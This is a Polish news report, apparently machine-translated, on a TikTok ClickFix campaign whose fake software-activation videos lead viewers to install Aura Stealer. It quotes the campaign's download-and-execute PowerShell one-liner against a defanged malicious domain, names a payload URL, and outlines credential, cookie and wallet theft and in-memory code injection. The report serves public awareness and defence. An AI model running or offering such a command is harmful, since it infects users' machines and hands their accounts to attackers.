Cyberprzestępcy rozpowszechniają szkodliwe oprogramowanie kradnące informacje za pośrednictwem kampanii na TikToku, wykorzystując filmy fałszywie podające się za bezpłatne przewodniki aktywacji popularnego oprogramowania. Trwająca operacja, zidentyfikowana 19 października 2025 r., wykorzystuje metodę inżynierii społecznej w celu nakłonienia użytkowników do zainfekowania własnych komputerów. Handlowiec ISC Xavier Mertens relacjonował kampanię, zauważając jej podobieństwo do operacji zaobserwowanej przez Trend Micro w maju. Filmy TikTok mają zawierać instrukcje dotyczące aktywacji legalnego oprogramowania, takiego jak Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro i Discord Nitro. Kampania promuje także sfabrykowane usługi, w tym „Netflix Premium” i „Spotify Premium”, aby przyciągnąć szerszą publiczność. Technika ataku znana jest jako atak ClickFix i polega na dostarczaniu pozornie pomocnych instrukcji, które zwodzą użytkowników w celu uruchomienia złośliwych poleceń. Filmy wyświetlają krótkie, jednowierszowe polecenie programu PowerShell i instruują widzów, aby wykonali je z uprawnieniami administratora. Przykładowe pokazane polecenie to iex (irm slmgr[.]win/photoshop). Konkretna nazwa programu w adresie URL, np. „Photoshop”, zostaje zmieniona w celu dopasowania do oprogramowania, pod którego się podszywa w filmie. Gdy użytkownik wykona to polecenie, program PowerShell łączy się z witryną zdalną slmgr[.]win. Ta akcja pobiera i uruchamia drugi skrypt PowerShell, który następnie pobiera dwa pliki wykonywalne ze stron Cloudflare. Pierwszy plik pobrany z https://file-epq[.]pages[.]dev/updater.exejest odmianą złośliwego oprogramowania Aura Stealer. Aura Stealer ma na celu zbieranie zapisanych danych uwierzytelniających z przeglądarek internetowych, uwierzytelniających plików cookie, portfeli kryptowalut i danych logowania z innych aplikacji. Te skradzione informacje są następnie przesyłane do atakujących, zapewniając im dostęp do kont ofiary. Drugi ładunek, nazwany source.exejest również pobierany. Ten plik wykonywalny służy do samodzielnej kompilacji kodu przy użyciu wbudowanego kompilatora Visual C# platformy .NET (csc.exe). Skompilowany kod jest następnie wstrzykiwany i uruchamiany bezpośrednio w pamięci. Konkretny cel tego drugiego ładunku nie został jeszcze ustalony. Użytkownicy, którzy postępowali zgodnie z instrukcjami zawartymi w tych filmach, powinni uważać, że wszystkie ich dane uwierzytelniające zostały naruszone, i zaleca się natychmiastowe zresetowanie haseł do wszystkich witryn i usług online, z których korzystają. W ciągu ostatniego roku ataki ClickFix stały się znacznie częstsze. Służą do dystrybucji różnych odmian złośliwego oprogramowania w kampaniach związanych z oprogramowaniem ransomware i kradzieżą kryptowalut. Zgodnie z ogólną praktyką bezpieczeństwa użytkownicy nigdy nie powinni kopiować tekstu ze strony internetowej i uruchamiać go w oknie dialogowym systemu operacyjnego, w tym w pasku adresu Eksploratora plików, wierszu poleceń, programie PowerShell, terminalu macOS lub powłokach systemu Linux.

  Wszystkie odpowiedzi LoLdle dzisiaj (19.08): Życie jako Garen jest po prostu proste. Po prostu machaj mieczem

Source: Filmy TikTok rozprzestrzeniają Aura Stealer za pośrednictwem fałszywych przewodników po oprogramowaniu